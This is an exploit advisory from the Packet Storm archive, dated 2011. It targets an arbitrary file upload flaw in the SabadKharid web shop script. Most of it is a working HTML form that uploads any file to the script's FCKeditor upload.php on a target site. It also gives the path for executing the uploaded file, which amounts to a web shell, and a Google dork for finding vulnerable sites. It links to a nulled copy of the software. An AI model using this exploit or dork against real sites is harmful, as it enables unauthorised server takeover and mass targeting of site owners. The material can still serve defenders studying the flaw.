SabadKharid Shell Upload

2011-09-29T00:00:00
ID PACKETSTORM:105424
Type packetstorm
Reporter St493r
Modified 2011-09-29T00:00:00

Description

                                        
                                            `+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Author : St493r  
[#] Contact : St493r@gmail.com  
[#] Title : SabadKharid Remote Arbitrary File Upload Exploit   
[#] Vendor : http://sabadkharid.com  
[#] Software : http://dl.p30vel.ir/scripts/sabadkharid-professional-nulled-p30vel.zip  
[#] Tested On : Linux  
[#] Date : 28 - 09 - 2011  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Vulnerability File : /wysiwyg/editor/filemanager/upload/php/upload.php  
[#] Exploit : Exploit.html  
  
<strong>SabadKharid Remote Arbitrary File Upload Exploit</strong>  
<form enctype="multipart/form-data" action="  
http://TARGET/wysiwyg/editor/filemanager/upload/php/upload.php?Type=Media"  
method="post">  
<input name="NewFile" type="file">  
<input type="submit" value="submit">  
</form>  
  
You can execute your uploaded file from : http://TARGET/userfiles/yourfile  
  
You can upload any file with any suffic  
  
Google dork : Powered by Sabadkharid , inurl:"index.php?register"  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Thanks To All Iranian Hackers  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
`